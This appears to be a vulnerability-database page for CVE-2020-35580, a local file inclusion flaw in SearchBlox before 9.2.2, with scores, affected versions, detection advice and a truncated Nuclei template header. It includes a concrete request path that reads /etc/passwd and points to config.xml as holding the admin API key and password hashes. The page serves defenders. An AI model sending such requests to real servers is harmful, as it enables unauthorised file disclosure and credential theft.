CVE-2020-35580
published 2021-05-20CVE-2020-35580: A local file inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the…
PriorityP178high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
13.98%
96.1th percentile
A local file inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin's API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| searchblox | searchblox | < 9.2.2 | 9.2.2 |
Detection & IOCsextracted from sources · hover to see the quote
path/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
- →Detect LFI exploitation attempts targeting the SearchBlox FileServlet by monitoring GET requests to the path /searchblox/servlet/FileServlet with a 'url=' parameter, especially those referencing sensitive OS files like /etc/passwd or config paths like WEB-INF/config.xml. ↗
- →A successful exploitation response body will contain the Unix passwd file pattern 'root:.*:0:0:' — use this regex to detect successful LFI data exfiltration in HTTP response bodies.
- →Monitor for unauthenticated access to searchblox/WEB-INF/config.xml via the FileServlet, as this file contains the Super Admin API key and base64-encoded SHA1 password hashes of all SearchBlox users. ↗
- ·The vulnerability affects all SearchBlox versions before 9.2.2. The LFI is exploitable without authentication, meaning no session cookie or API key is required to trigger the issue. ↗
- ·Successful exploitation of this LFI can yield the Super Admin API key and base64-encoded SHA1 hashes of all user passwords from config.xml, enabling further account compromise beyond file disclosure. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rxfx-hr79-qv8h: A local file inclusion vulnerability in the FileServlet in all SearchBlox before 9
ghsa_unreviewed·2022-05-24
CVE-2020-35580 [HIGH] CWE-522 GHSA-rxfx-hr79-qv8h: A local file inclusion vulnerability in the FileServlet in all SearchBlox before 9
A local file inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin's API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
VulnCheck
searchblox searchblox Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2020·CVSS 7.5
CVE-2020-35580 [HIGH] searchblox searchblox Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
searchblox searchblox Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
A local file inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin's API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
Affected: searchblox searchblox
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https:/
No detection rules found.
Nuclei
SearchBlox <9.2.2 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2020-35580 [HIGH] SearchBlox <9.2.2 - Local File Inclusion
SearchBlox <9.2.2 - Local File Inclusion
SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
Template:
id: CVE-2020-35580
info:
name: SearchBlox <9.2.2 - Local File Inclusion
author: daffainfo
severity: high
description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary
No writeups or analysis indexed.
2021-05-20
Published
Exploited in the wild